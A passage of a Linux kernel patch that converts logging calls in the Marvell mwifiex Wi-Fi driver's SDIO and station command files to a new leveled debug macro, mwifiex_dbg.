mwifiex_host_to_card_mp_aggr(struct mwifiex_adapter *adapter, if (!card->mpa_tx.enabled || (card->has_control_mask && (port == CTRL_PORT)) || (card->supports_sdio_new_mode && (port == CMD_PORT_SLCT))) { - dev_dbg(adapter->dev, "info: %s: tx aggregation disabled\n", - __func__); + mwifiex_dbg(adapter, WARN, + "info: %s: tx aggregation disabled\n", + __func__); f_send_cur_buf = 1; goto tx_curr_single; @@ -1628,8 +1679,9 @@ static int mwifiex_host_to_card_mp_aggr(struct mwifiex_adapter *adapter, if (next_pkt_len) { /* More pkt in TX queue */ - dev_dbg(adapter->dev, "info: %s: more packets in queue.\n", - __func__); + mwifiex_dbg(adapter, INFO, + "info: %s: more packets in queue.\n", + __func__); if (MP_TX_AGGR_IN_PROGRESS(card)) { if (MP_TX_AGGR_BUF_HAS_ROOM(card, pkt_len)) { @@ -1659,8 +1711,9 @@ static int mwifiex_host_to_card_mp_aggr(struct mwifiex_adapter *adapter, } } else { /* Last pkt in TX queue */ - dev_dbg(adapter->dev, "info: %s: Last packet in Tx Queue.\n", - __func__); + mwifiex_dbg(adapter, INFO, + "info: %s: Last packet in Tx Queue.\n", + __func__); if (MP_TX_AGGR_IN_PROGRESS(card)) { /* some packs in Aggr buf already */ @@ -1677,8 +1730,9 @@ static int mwifiex_host_to_card_mp_aggr(struct mwifiex_adapter *adapter, } if (f_precopy_cur_buf) { - dev_dbg(adapter->dev, "data: %s: precopy current buffer\n", - __func__); + mwifiex_dbg(adapter, DATA, + "data: %s: precopy current buffer\n", + __func__); MP_TX_AGGR_BUF_PUT(card, payload, pkt_len, port); if (MP_TX_AGGR_PKT_LIMIT_REACHED(card) || @@ -1688,9 +1742,10 @@ static int mwifiex_host_to_card_mp_aggr(struct mwifiex_adapter *adapter, } if (f_send_aggr_buf) { - dev_dbg(adapter->dev, "data: %s: send aggr buffer: %d %d\n", - __func__, - card->mpa_tx.start_port, card->mpa_tx.ports); + mwifiex_dbg(adapter, DATA, + "data: %s: send aggr buffer: %d %d\n", + __func__, card->mpa_tx.start_port, + card->mpa_tx.ports); if (card->supports_sdio_new_mode) { u32 port_count; int i; @@ -1719,15 +1774,17 @@ static int mwifiex_host_to_card_mp_aggr(struct mwifiex_adapter *adapter, tx_curr_single: if (f_send_cur_buf) { - dev_dbg(adapter->dev, "data: %s: send current buffer %d\n", - __func__, port); + mwifiex_dbg(adapter, DATA, + "data: %s: send current buffer %d\n", + __func__, port); ret = mwifiex_write_data_to_card(adapter, payload, pkt_len, adapter->ioport + port); } if (f_postcopy_cur_buf) { - dev_dbg(adapter->dev, "data: %s: postcopy current buffer\n", - __func__); + mwifiex_dbg(adapter, DATA, + "data: %s: postcopy current buffer\n", + __func__); MP_TX_AGGR_BUF_PUT(card, payload, pkt_len, port); } @@ -1771,8 +1828,9 @@ static int mwifiex_sdio_host_to_card(struct mwifiex_adapter *adapter, if (type == MWIFIEX_TYPE_DATA) { ret = mwifiex_get_wr_port_data(adapter, &port); if (ret) { - dev_err(adapter->dev, "%s: no wr_port available\n", - __func__); + mwifiex_dbg(adapter, ERROR, + "%s: no wr_port available\n", + __func__); return ret; } } else { @@ -1781,8 +1839,9 @@ static int mwifiex_sdio_host_to_card(struct mwifiex_adapter *adapter, if (pkt_len <= INTF_HEADER_LEN || pkt_len > MWIFIEX_UPLD_SIZE) - dev_err(adapter->dev, "%s: payload=%p, nb=%d\n", - __func__, payload, pkt_len); + mwifiex_dbg(adapter, ERROR, + "%s: payload=%p, nb=%d\n", + __func__, payload, pkt_len); if (card->supports_sdio_new_mode) port = CMD_PORT_SLCT; @@ -1896,7 +1955,8 @@ static int mwifiex_register_dev(struct mwifiex_adapter *adapter) ret = sdio_set_block_size(card->func, MWIFIEX_SDIO_BLOCK_SIZE); sdio_release_host(func); if (ret) { - pr_err("cannot set SDIO block size\n"); + mwifiex_dbg(adapter, ERROR, + "cannot set SDIO block size\n"); return ret; } @@ -1977,7 +2037,8 @@ static int mwifiex_init_sdio(struct mwifiex_adapter *adapter) card->mp_tx_agg_buf_size, card->mp_rx_agg_buf_size); if (ret) { - dev_err(adapter->dev, "failed to alloc sdio mp-a buffers\n"); + mwifiex_dbg(adapter, ERROR, + "failed to alloc sdio mp-a buffers\n"); kfree(card->mp_regs); return -1; } @@ -2041,8 +2102,9 @@ mwifiex_update_mp_end_port(struct mwifiex_adapter *adapter, u16 port) card->curr_wr_port = reg->start_wr_port; - dev_dbg(adapter->dev, "cmd: mp_end_port %d, data port mask 0x%x\n", - port, card->mp_data_port_mask); + mwifiex_dbg(adapter, CMD, + "cmd: mp_end_port %d, data port mask 0x%x\n", + port, card->mp_data_port_mask); } static struct mwifiex_adapter *save_adapter; @@ -2059,7 +2121,7 @@ static void mwifiex_sdio_card_reset_work(struct mwifiex_adapter *adapter) * We run it in a totally independent workqueue. */ - pr_err("Resetting card...\n"); + mwifiex_dbg(adapter, WARN, "Resetting card...\n"); mmc_remove_host(target); /* 200ms delay is based on experiment with sdhci controller */ mdelay(200); @@ -2079,14 +2141,14 @@ rdwr_status mwifiex_sdio_rdwr_firmware(struct mwifiex_adapter *adapter, sdio_writeb(card->func, FW_DUMP_HOST_READY, card->reg->fw_dump_ctrl, &ret); if (ret) { - dev_err(adapter->dev, "SDIO Write ERR\n"); + mwifiex_dbg(adapter, ERROR, "SDIO Write ERR\n"); return RDWR_STATUS_FAILURE; } for (tries = 0; tries < MAX_POLL_TRIES; tries++) { ctrl_data = sdio_readb(card->func, card->reg->fw_dump_ctrl, &ret); if (ret) { - dev_err(adapter->dev, "SDIO read err\n"); + mwifiex_dbg(adapter, ERROR, "SDIO read err\n"); return RDWR_STATUS_FAILURE; } if (ctrl_data == FW_DUMP_DONE) @@ -2094,19 +2156,20 @@ rdwr_status mwifiex_sdio_rdwr_firmware(struct mwifiex_adapter *adapter, if (doneflag && ctrl_data == doneflag) return RDWR_STATUS_DONE; if (ctrl_data != FW_DUMP_HOST_READY) { - dev_info(adapter->dev, - "The ctrl reg was changed, re-try again!\n"); + mwifiex_dbg(adapter, WARN, + "The ctrl reg was changed, re-try again!\n"); sdio_writeb(card->func, FW_DUMP_HOST_READY, card->reg->fw_dump_ctrl, &ret); if (ret) { - dev_err(adapter->dev, "SDIO write err\n"); + mwifiex_dbg(adapter, ERROR, "SDIO write err\n"); return RDWR_STATUS_FAILURE; } } usleep_range(100, 200); } if (ctrl_data == FW_DUMP_HOST_READY) { - dev_err(adapter->dev, "Fail to pull ctrl_data\n"); + mwifiex_dbg(adapter, ERROR, + "Fail to pull ctrl_data\n"); return RDWR_STATUS_FAILURE; } @@ -2142,7 +2205,7 @@ static void mwifiex_sdio_fw_dump_work(struct mwifiex_adapter *adapter) mwifiex_pm_wakeup_card(adapter); sdio_claim_host(card->func); - dev_info(adapter->dev, "== mwifiex firmware dump start ==\n"); + mwifiex_dbg(adapter, MSG, "== mwifiex firmware dump start ==\n"); stat = mwifiex_sdio_rdwr_firmware(adapter, doneflag); if (stat == RDWR_STATUS_FAILURE) @@ -2152,7 +2215,7 @@ static void mwifiex_sdio_fw_dump_work(struct mwifiex_adapter *adapter) /* Read the number of the memories which will dump */ dump_num = sdio_readb(card->func, reg, &ret); if (ret) { - dev_err(adapter->dev, "SDIO read memory length err\n"); + mwifiex_dbg(adapter, ERROR, "SDIO read memory length err\n"); goto done; } @@ -2169,7 +2232,7 @@ static void mwifiex_sdio_fw_dump_work(struct mwifiex_adapter *adapter) for (i = 0; i < 4; i++) { read_reg = sdio_readb(card->func, reg, &ret); if (ret) { - dev_err(adapter->dev, "SDIO read err\n"); + mwifiex_dbg(adapter, ERROR, "SDIO read err\n"); goto done; } memory_size |= (read_reg << i*8); @@ -2177,25 +2240,26 @@ static void mwifiex_sdio_fw_dump_work(struct mwifiex_adapter *adapter) } if (memory_size == 0) { - dev_info(adapter->dev, "Firmware dump Finished!\n"); + mwifiex_dbg(adapter, DUMP, "Firmware dump Finished!\n"); break; } - dev_info(adapter->dev, - "%s_SIZE=0x%x\n", entry->mem_name, memory_size); + mwifiex_dbg(adapter, DUMP, + "%s_SIZE=0x%x\n", entry->mem_name, memory_size); entry->mem_ptr = vmalloc(memory_size + 1); entry->mem_size = memory_size; if (!entry->mem_ptr) { - dev_err(adapter->dev, "Vmalloc %s failed\n", - entry->mem_name); + mwifiex_dbg(adapter, ERROR, "Vmalloc %s failed\n", + entry->mem_name); goto done; } dbg_ptr = entry->mem_ptr; end_ptr = dbg_ptr + memory_size; doneflag = entry->done_flag; - dev_info(adapter->dev, "Start %s output, please wait...\n", - entry->mem_name); + mwifiex_dbg(adapter, DUMP, + "Start %s output, please wait...\n", + entry->mem_name); do { stat = mwifiex_sdio_rdwr_firmware(adapter, doneflag); @@ -2207,26 +2271,26 @@ static void mwifiex_sdio_fw_dump_work(struct mwifiex_adapter *adapter) for (reg = reg_start; reg <= reg_end; reg++) { *dbg_ptr = sdio_readb(card->func, reg, &ret); if (ret) { - dev_err(adapter->dev, - "SDIO read err\n"); + mwifiex_dbg(adapter, ERROR, + "SDIO read err\n"); goto done; } if (dbg_ptr < end_ptr) dbg_ptr++; else - dev_err(adapter->dev, - "Allocated buf not enough\n"); + mwifiex_dbg(adapter, ERROR, + "Allocated buf not enough\n"); } if (stat != RDWR_STATUS_DONE) continue; - dev_info(adapter->dev, "%s done: size=0x%tx\n", - entry->mem_name, dbg_ptr - entry->mem_ptr); + mwifiex_dbg(adapter, DUMP, "%s done: size=0x%tx\n", + entry->mem_name, dbg_ptr - entry->mem_ptr); break; } while (1); } - dev_info(adapter->dev, "== mwifiex firmware dump end ==\n"); + mwifiex_dbg(adapter, MSG, "== mwifiex firmware dump end ==\n"); kobject_uevent_env(&adapter->wiphy->dev.kobj, KOBJ_CHANGE, env); @@ -2285,7 +2349,7 @@ mwifiex_sdio_reg_dump(struct mwifiex_adapter *adapter, char *drv_buf) if (!p) return 0; - dev_info(adapter->dev, "SDIO register DUMP START\n"); + mwifiex_dbg(adapter, MSG, "SDIO register DUMP START\n"); mwifiex_pm_wakeup_card(adapter); @@ -2351,13 +2415,13 @@ mwifiex_sdio_reg_dump(struct mwifiex_adapter *adapter, char *drv_buf) reg++; } - dev_info(adapter->dev, "%s\n", buf); + mwifiex_dbg(adapter, MSG, "%s\n", buf); p += sprintf(p, "%s\n", buf); } sdio_release_host(cardp->func); - dev_info(adapter->dev, "SDIO register DUMP END\n"); + mwifiex_dbg(adapter, MSG, "SDIO register DUMP END\n"); return p - drv_buf; } diff --git a/drivers/net/wireless/mwifiex/sta_cmd.c b/drivers/net/wireless/mwifiex/sta_cmd.c index a76d6a4340d0..037adcd1f484 100644 --- a/drivers/net/wireless/mwifiex/sta_cmd.c +++ b/drivers/net/wireless/mwifiex/sta_cmd.c @@ -77,8 +77,8 @@ static int mwifiex_cmd_mac_control(struct mwifiex_private *priv, struct host_cmd_ds_mac_control *mac_ctrl = &cmd->params.mac_ctrl; if (cmd_action != HostCmd_ACT_GEN_SET) { - dev_err(priv->adapter->dev, - "mac_control: only support set cmd\n"); + mwifiex_dbg(priv->adapter, ERROR, + "mac_control: only support set cmd\n"); return -1; } @@ -112,7 +112,8 @@ static int mwifiex_cmd_802_11_snmp_mib(struct mwifiex_private *priv, { struct host_cmd_ds_802_11_snmp_mib *snmp_mib = &cmd->params.smib; - dev_dbg(priv->adapter->dev, "cmd: SNMP_CMD: cmd_oid = 0x%x\n", cmd_oid); + mwifiex_dbg(priv->adapter, CMD, + "cmd: SNMP_CMD: cmd_oid = 0x%x\n", cmd_oid); cmd->command = cpu_to_le16(HostCmd_CMD_802_11_SNMP_MIB); cmd->size = cpu_to_le16(sizeof(struct host_cmd_ds_802_11_snmp_mib) - 1 + S_DS_GEN); @@ -129,11 +130,11 @@ static int mwifiex_cmd_802_11_snmp_mib(struct mwifiex_private *priv, le16_add_cpu(&cmd->size, sizeof(u16)); } - dev_dbg(priv->adapter->dev, - "cmd: SNMP_CMD: Action=0x%x, OID=0x%x, OIDSize=0x%x," - " Value=0x%x\n", - cmd_action, cmd_oid, le16_to_cpu(snmp_mib->buf_size), - le16_to_cpu(*(__le16 *) snmp_mib->value)); + mwifiex_dbg(priv->adapter, CMD, + "cmd: SNMP_CMD: Action=0x%x, OID=0x%x,\t" + "OIDSize=0x%x, Value=0x%x\n", + cmd_action, cmd_oid, le16_to_cpu(snmp_mib->buf_size), + le16_to_cpu(*(__le16 *)snmp_mib->value)); return 0; } @@ -356,9 +357,9 @@ mwifiex_cmd_802_11_hs_cfg(struct mwifiex_private *priv, (hscfg_param->conditions != cpu_to_le32(HS_CFG_CANCEL)) && ((adapter->arp_filter_size > 0) && (adapter->arp_filter_size <= ARP_FILTER_MAX_BUF_SIZE))) { - dev_dbg(adapter->dev, - "cmd: Attach %d bytes ArpFilter to HSCfg cmd\n", - adapter->arp_filter_size); + mwifiex_dbg(adapter, CMD, + "cmd: Attach %d bytes ArpFilter to HSCfg cmd\n", + adapter->arp_filter_size); memcpy(((u8 *) hs_cfg) + sizeof(struct host_cmd_ds_802_11_hs_cfg_enh), adapter->arp_filter, adapter->arp_filter_size); @@ -378,11 +379,11 @@ mwifiex_cmd_802_11_hs_cfg(struct mwifiex_private *priv, hs_cfg->params.hs_config.conditions = hscfg_param->conditions; hs_cfg->params.hs_config.gpio = hscfg_param->gpio; hs_cfg->params.hs_config.gap = hscfg_param->gap; - dev_dbg(adapter->dev, - "cmd: HS_CFG_CMD: condition:0x%x gpio:0x%x gap:0x%x\n", - hs_cfg->params.hs_config.conditions, - hs_cfg->params.hs_config.gpio, - hs_cfg->params.hs_config.gap); + mwifiex_dbg(adapter, CMD, + "cmd: HS_CFG_CMD: condition:0x%x gpio:0x%x gap:0x%x\n", + hs_cfg->params.hs_config.conditions, + hs_cfg->params.hs_config.gpio, + hs_cfg->params.hs_config.gap); } return 0; @@ -462,7 +463,7 @@ static int mwifiex_cmd_802_11_deauthenticate(struct mwifiex_private *priv, /* Set AP MAC address */ memcpy(deauth->mac_addr, mac, ETH_ALEN); - dev_dbg(priv->adapter->dev, "cmd: Deauth: %pM\n", deauth->mac_addr); + mwifiex_dbg(priv->adapter, CMD, "cmd: Deauth: %pM\n", deauth->mac_addr); deauth->reason_code = cpu_to_le16(WLAN_REASON_DEAUTH_LEAVING); @@ -540,9 +541,9 @@ mwifiex_set_keyparamset_wep(struct mwifiex_private *priv, } else if (!priv->wep_key[i].key_length) { continue; } else { - dev_err(priv->adapter->dev, - "key%d Length = %d is incorrect\n", - (i + 1), priv->wep_key[i].key_length); + mwifiex_dbg(priv->adapter, ERROR, + "key%d Length = %d is incorrect\n", + (i + 1), priv->wep_key[i].key_length); return -1; } } @@ -562,7 +563,8 @@ static int mwifiex_set_aes_key_v2(struct mwifiex_private *priv, u16 size, len = KEY_PARAMS_FIXED_LEN; if (enc_key->is_igtk_key) { - dev_dbg(adapter->dev, "%s: Set CMAC AES Key\n", __func__); + mwifiex_dbg(adapter, INFO, + "%s: Set CMAC AES Key\n", __func__); if (enc_key->is_rx_seq_valid) memcpy(km->key_param_set.key_params.cmac_aes.ipn, enc_key->pn, enc_key->pn_len); @@ -575,7 +577,8 @@ static int mwifiex_set_aes_key_v2(struct mwifiex_private *priv, enc_key->key_material, enc_key->key_len); len += sizeof(struct mwifiex_cmac_aes_param); } else { - dev_dbg(adapter->dev, "%s: Set AES Key\n", __func__); + mwifiex_dbg(adapter, INFO, + "%s: Set AES Key\n", __func__); if (enc_key->is_rx_seq_valid) memcpy(km->key_param_set.key_params.aes.pn, enc_key->pn, enc_key->pn_len); @@ -619,7 +622,7 @@ mwifiex_cmd_802_11_key_material_v2(struct mwifiex_private *priv, km->action = cpu_to_le16(cmd_action); if (cmd_action == HostCmd_ACT_GEN_GET) { - dev_dbg(adapter->dev, "%s: Get key\n", __func__); + mwifiex_dbg(adapter, INFO, "%s: Get key\n", __func__); km->key_param_set.key_idx = enc_key->key_index & KEY_INDEX_MASK; km->key_param_set.type = cpu_to_le16(TLV_TYPE_KEY_PARAM_V2); @@ -646,7 +649,7 @@ mwifiex_cmd_802_11_key_material_v2(struct mwifiex_private *priv, sizeof(struct mwifiex_ie_type_key_param_set_v2)); if (enc_key->key_disable) { - dev_dbg(adapter->dev, "%s: Remove key\n", __func__); + mwifiex_dbg(adapter, INFO, "%s: Remove key\n", __func__); km->action = cpu_to_le16(HostCmd_ACT_GEN_REMOVE); km->key_param_set.type = cpu_to_le16(TLV_TYPE_KEY_PARAM_V2); km->key_param_set.len = cpu_to_le16(KEY_PARAMS_FIXED_LEN); @@ -667,7 +670,7 @@ mwifiex_cmd_802_11_key_material_v2(struct mwifiex_private *priv, memcpy(km->key_param_set.mac_addr, mac, ETH_ALEN); if (enc_key->key_len <= WLAN_KEY_LEN_WEP104) { - dev_dbg(adapter->dev, "%s: Set WEP Key\n", __func__); + mwifiex_dbg(adapter, INFO, "%s: Set WEP Key\n", __func__); len += sizeof(struct mwifiex_wep_param); km->key_param_set.len = cpu_to_le16(len); km->key_param_set.key_type = KEY_TYPE_ID_WEP; @@ -710,7 +713,7 @@ mwifiex_cmd_802_11_key_material_v2(struct mwifiex_private *priv, key_info |= KEY_UNICAST | KEY_TX_KEY | KEY_RX_KEY; if (enc_key->is_wapi_key) { - dev_dbg(adapter->dev, "%s: Set WAPI Key\n", __func__); + mwifiex_dbg(adapter, INFO, "%s: Set WAPI Key\n", __func__); km->key_param_set.key_type = KEY_TYPE_ID_WAPI; memcpy(km->key_param_set.key_params.wapi.pn, enc_key->pn, PN_LEN); @@ -750,7 +753,8 @@ mwifiex_cmd_802_11_key_material_v2(struct mwifiex_private *priv, return mwifiex_set_aes_key_v2(priv, cmd, enc_key, km); if (enc_key->key_len == WLAN_KEY_LEN_TKIP) { - dev_dbg(adapter->dev, "%s: Set TKIP Key\n", __func__); + mwifiex_dbg(adapter, INFO, + "%s: Set TKIP Key\n", __func__); if (enc_key->is_rx_seq_valid) memcpy(km->key_param_set.key_params.tkip.pn, enc_key->pn, enc_key->pn_len); @@ -814,7 +818,7 @@ mwifiex_cmd_802_11_key_material_v1(struct mwifiex_private *priv, memset(&key_material->key_param_set, 0, sizeof(struct mwifiex_ie_type_key_param_set)); if (enc_key->is_wapi_key) { - dev_dbg(priv->adapter->dev, "info: Set WAPI Key\n"); + mwifiex_dbg(priv->adapter, INFO, "info: Set WAPI Key\n"); key_material->key_param_set.key_type_id = cpu_to_le16(KEY_TYPE_ID_WAPI); if (cmd_oid == KEY_INFO_ENABLED) @@ -860,7 +864,7 @@ mwifiex_cmd_802_11_key_material_v1(struct mwifiex_private *priv, } if (enc_key->key_len == WLAN_KEY_LEN_CCMP) { if (enc_key->is_igtk_key) { - dev_dbg(priv->adapter->dev, "cmd: CMAC_AES\n"); + mwifiex_dbg(priv->adapter, CMD, "cmd: CMAC_AES\n"); key_material->key_param_set.key_type_id = cpu_to_le16(KEY_TYPE_ID_AES_CMAC); if (cmd_oid == KEY_INFO_ENABLED) @@ -873,7 +877,7 @@ mwifiex_cmd_802_11_key_material_v1(struct mwifiex_private *priv, key_material->key_param_set.key_info |= cpu_to_le16(KEY_IGTK); } else { - dev_dbg(priv->adapter->dev, "cmd: WPA_AES\n"); + mwifiex_dbg(priv->adapter, CMD, "cmd: WPA_AES\n"); key_material->key_param_set.key_type_id = cpu_to_le16(KEY_TYPE_ID_AES); if (cmd_oid == KEY_INFO_ENABLED) @@ -892,7 +896,7 @@ mwifiex_cmd_802_11_key_material_v1(struct mwifiex_private *priv, cpu_to_le16(KEY_MCAST); } } else if (enc_key->key_len == WLAN_KEY_LEN_TKIP) { - dev_dbg(priv->adapter->dev, "cmd: WPA_TKIP\n"); + mwifiex_dbg(priv->adapter, CMD, "cmd: WPA_TKIP\n"); key_material->key_param_set.key_type_id = cpu_to_le16(KEY_TYPE_ID_TKIP); key_material->key_param_set.key_info = @@ -999,7 +1003,8 @@ static int mwifiex_cmd_802_11d_domain_info(struct mwifiex_private *priv, &domain_info->domain; u8 no_of_triplet = adapter->domain_reg.no_of_triplet; - dev_dbg(adapter->dev, "info: 11D: no_of_triplet=0x%x\n", no_of_triplet); + mwifiex_dbg(adapter, INFO, + "info: 11D: no_of_triplet=0x%x\n", no_of_triplet); cmd->command = cpu_to_le16(HostCmd_CMD_802_11D_DOMAIN_INFO); domain_info->action = cpu_to_le16(cmd_action); @@ -1235,8 +1240,9 @@ mwifiex_cmd_pcie_host_spec(struct mwifiex_private *priv, (u32)(card->sleep_cookie_pbase); host_spec->sleep_cookie_addr_hi = (u32)(((u64)(card->sleep_cookie_pbase)) >> 32); - dev_dbg(priv->adapter->dev, "sleep_cook_lo phy addr: 0x%x\n", - host_spec->sleep_cookie_addr_lo); + mwifiex_dbg(priv->adapter, INFO, + "sleep_cook_lo phy addr: 0x%x\n", + host_spec->sleep_cookie_addr_lo); } return 0; @@ -1263,7 +1269,8 @@ mwifiex_cmd_802_11_subsc_evt(struct mwifiex_private *priv, S_DS_GEN); subsc_evt->action = cpu_to_le16(subsc_evt_cfg->action); - dev_dbg(priv->adapter->dev, "cmd: action: %d\n", subsc_evt_cfg->action); + mwifiex_dbg(priv->adapter, CMD, + "cmd: action: %d\n", subsc_evt_cfg->action); /*For query requests, no configuration TLV structures are to be added.*/ if (subsc_evt_cfg->action == HostCmd_ACT_GEN_GET) @@ -1272,14 +1279,15 @@ mwifiex_cmd_802_11_subsc_evt(struct mwifiex_private *priv, subsc_evt->events = cpu_to_le16(subsc_evt_cfg->events); event_bitmap = subsc_evt_cfg->events; - dev_dbg(priv->adapter->dev, "cmd: event bitmap : %16x\n", - event_bitmap); + mwifiex_dbg(priv->adapter, CMD, "cmd: event bitmap : %16x\n", + event_bitmap); if (((subsc_evt_cfg->action == HostCmd_ACT_BITWISE_CLR) || (subsc_evt_cfg->action == HostCmd_ACT_BITWISE_SET)) && (event_bitmap == 0)) { - dev_dbg(priv->adapter->dev, "Error: No event specified " - "for bitwise action type\n"); + mwifiex_dbg(priv->adapter, ERROR, + "Error: No event specified\t" + "for bitwise action type\n"); return -EINVAL; } @@ -1304,10 +1312,11 @@ mwifiex_cmd_802_11_subsc_evt(struct mwifiex_private *priv, rssi_tlv->abs_value = subsc_evt_cfg->bcn_l_rssi_cfg.abs_value; rssi_tlv->evt_freq = subsc_evt_cfg->bcn_l_rssi_cfg.evt_freq; - dev_dbg(priv->adapter->dev, "Cfg Beacon Low Rssi event, " - "RSSI:-%d dBm, Freq:%d\n", - subsc_evt_cfg->bcn_l_rssi_cfg.abs_value, - subsc_evt_cfg->bcn_l_rssi_cfg.evt_freq); + mwifiex_dbg(priv->adapter, EVENT, + "Cfg Beacon Low Rssi event,\t" + "RSSI:-%d dBm, Freq:%d\n", + subsc_evt_cfg->bcn_l_rssi_cfg.abs_value, + subsc_evt_cfg->bcn_l_rssi_cfg.evt_freq); pos += sizeof(struct mwifiex_ie_types_rssi_threshold); le16_add_cpu(&cmd->size, @@ -1324,10 +1333,11 @@ mwifiex_cmd_802_11_subsc_evt(struct mwifiex_private *priv, rssi_tlv->abs_value = subsc_evt_cfg->bcn_h_rssi_cfg.abs_value; rssi_tlv->evt_freq = subsc_evt_cfg->bcn_h_rssi_cfg.evt_freq; - dev_dbg(priv->adapter->dev, "Cfg Beacon High Rssi event, " - "RSSI:-%d dBm, Freq:%d\n", - subsc_evt_cfg->bcn_h_rssi_cfg.abs_value, - subsc_evt_cfg->bcn_h_rssi_cfg.evt_freq); + mwifiex_dbg(priv->adapter, EVENT, + "Cfg Beacon High Rssi event,\t" + "RSSI:-%d dBm, Freq:%d\n", + subsc_evt_cfg->bcn_h_rssi_cfg.abs_value, + subsc_evt_cfg->bcn_h_rssi_cfg.evt_freq); pos += sizeof(struct mwifiex_ie_types_rssi_threshold); le16_add_cpu(&cmd->size, @@ -1483,12 +1493,14 @@ static int mwifiex_cmd_cfg_data(struct mwifiex_private *priv, data, len); if (ret) return ret; - dev_dbg(adapter->dev, - "download cfg_data from device tree: %s\n", prop->name); + mwifiex_dbg(adapter, INFO, + "download cfg_data from device tree: %s\n", + prop->name); } else if (adapter->cal_data->data && adapter->cal_data->size > 0) { len = mwifiex_parse_cal_cfg((u8 *)adapter->cal_data->data, adapter->cal_data->size, data); - dev_dbg(adapter->dev, "download cfg_data from config file\n"); + mwifiex_dbg(adapter, INFO, + "download cfg_data from config file\n"); } else { return -1; } @@ -1603,9 +1615,9 @@ mwifiex_cmd_tdls_oper(struct mwifiex_private *priv, tdls_oper->tdls_action = cpu_to_le16(ACT_TDLS_CONFIG); if (!params) { - dev_err(priv->adapter->dev, - "TDLS config params not available for %pM\n", - oper->peer_mac); + mwifiex_dbg(priv->adapter, ERROR, + "TDLS config params not available for %pM\n", + oper->peer_mac); return -ENODATA; } @@ -1683,7 +1695,7 @@ mwifiex_cmd_tdls_oper(struct mwifiex_private *priv, break; default: - dev_err(priv->adapter->dev, "Unknown TDLS operation\n"); + mwifiex_dbg(priv->adapter, ERROR, "Unknown TDLS operation\n"); return -ENOTSUPP; } @@ -1890,8 +1902,8 @@ int mwifiex_sta_prepare_cmd(struct mwifiex_private *priv, uint16_t cmd_no, ret = mwifiex_cmd_11n_cfg(priv, cmd_ptr, cmd_action, data_buf); break; case HostCmd_CMD_WMM_GET_STATUS: - dev_dbg(priv->adapter->dev, - "cmd: WMM: WMM_GET_STATUS cmd sent\n"); + mwifiex_dbg(priv->adapter, CMD, + "cmd: WMM: WMM_GET_STATUS cmd sent\n"); cmd_ptr->command = cpu_to_le16(HostCmd_CMD_WMM_GET_STATUS); cmd_ptr->size = cpu_to_le16(sizeof(struct host_cmd_ds_wmm_get_status) + @@ -1955,8 +1967,8 @@ int mwifiex_sta_prepare_cmd(struct mwifiex_private *priv, uint16_t cmd_no, data_buf); break; default: - dev_err(priv->adapter->dev, - "PREP_CMD: unknown cmd- %#x\n", cmd_no); + mwifiex_dbg(priv->adapter, ERROR, + "PREP_CMD: unknown cmd- %#x\n", cmd_no); ret = -1; break; } @@ -2047,8 +2059,8 @@ int mwifiex_sta_init_cmd(struct mwifiex_private *priv, u8 first_sta, bool init) &sdio_sp_rx_aggr_enable, true); if (ret) { - dev_err(priv->adapter->dev, - "error while enabling SP aggregation..disable it"); + mwifiex_dbg(priv->adapter, ERROR, + "error while enabling SP aggregation..disable it"); adapter->sdio_rx_aggr_enable = false; } } @@ -2131,8 +2143,8 @@ int mwifiex_sta_init_cmd(struct mwifiex_private *priv, u8 first_sta, bool init) HostCmd_ACT_GEN_SET, DOT11D_I, &state_11d, true); if (ret) - dev_err(priv->adapter->dev, - "11D: failed to enable 11D\n"); + mwifiex_dbg(priv->adapter, ERROR, + "11D: failed to enable 11D\n"); } /* Send cmd to FW to configure 11n specific configuration diff --git a/drivers/net/wireless/mwifiex/sta_cmdresp.c b/drivers/net/wireless/mwifiex/sta_cmdresp.c index efe31a2a90c9..aa5b9a310340 100644 --- a/drivers/net/wireless/mwifiex/sta_cmdresp.c +++ b/drivers/net/wireless/mwifiex/sta_cmdresp.c @@ -49,8 +49,9 @@ mwifiex_process_cmdresp_error(struct mwifiex_private *priv, struct host_cmd_ds_802_11_ps_mode_enh *pm; unsigned long flags; - dev_err(adapter->dev, "CMD_RESP: cmd %#x error, result=%#x\n", - resp->command, resp->result); + mwifiex_dbg(adapter, ERROR, + "CMD_RESP: cmd %#x error, result=%#x\n", + resp->command, resp->result); if (adapter->curr_cmd->wait_q_enabled) adapter->cmd_wait_q.status = -1; @@ -58,9 +59,9 @@ mwifiex_process_cmdresp_error(struct mwifiex_private *priv, switch (le16_to_cpu(resp->command)) { case HostCmd_CMD_802_11_PS_MODE_ENH: pm = &resp->params.psmode_enh; - dev_err(adapter->dev, - "PS_MODE_ENH cmd failed: result=0x%x action=0x%X\n", - resp->result, le16_to_cpu(pm->action)); + mwifiex_dbg(adapter, ERROR, + "PS_MODE_ENH cmd failed: result=0x%x action=0x%X\n", + resp->result, le16_to_cpu(pm->action)); /* We do not re-try enter-ps command in ad-hoc mode. */ if (le16_to_cpu(pm->action) == EN_AUTO_PS && (le16_to_cpu(pm->params.ps_bitmap) & BITMAP_STA_PS) && @@ -91,7 +92,8 @@ mwifiex_process_cmdresp_error(struct mwifiex_private *priv, break; case HostCmd_CMD_SDIO_SP_RX_AGGR_CFG: - dev_err(priv->adapter->dev, "SDIO RX single-port aggregation Not support\n"); + mwifiex_dbg(adapter, MSG, + "SDIO RX single-port aggregation Not support\n"); break; default: @@ -187,29 +189,34 @@ static int mwifiex_ret_802_11_snmp_mib(struct mwifiex_private *priv, u16 query_type = le16_to_cpu(smib->query_type); u32 ul_temp; - dev_dbg(priv->adapter->dev, "info: SNMP_RESP: oid value = %#x," - " query_type = %#x, buf size = %#x\n", - oid, query_type, le16_to_cpu(smib->buf_size)); + mwifiex_dbg(priv->adapter, INFO, + "info: SNMP_RESP: oid value = %#x,\t" + "query_type = %#x, buf size = %#x\n", + oid, query_type, le16_to_cpu(smib->buf_size)); if (query_type == HostCmd_ACT_GEN_GET) { ul_temp = le16_to_cpu(*((__le16 *) (smib->value))); if (data_buf) *data_buf = ul_temp; switch (oid) { case FRAG_THRESH_I: - dev_dbg(priv->adapter->dev, - "info: SNMP_RESP: FragThsd =%u\n", ul_temp); + mwifiex_dbg(priv->adapter, INFO, + "info: SNMP_RESP: FragThsd =%u\n", + ul_temp); break; case RTS_THRESH_I: - dev_dbg(priv->adapter->dev, - "info: SNMP_RESP: RTSThsd =%u\n", ul_temp); + mwifiex_dbg(priv->adapter, INFO, + "info: SNMP_RESP: RTSThsd =%u\n", + ul_temp); break; case SHORT_RETRY_LIM_I: - dev_dbg(priv->adapter->dev, - "info: SNMP_RESP: TxRetryCount=%u\n", ul_temp); + 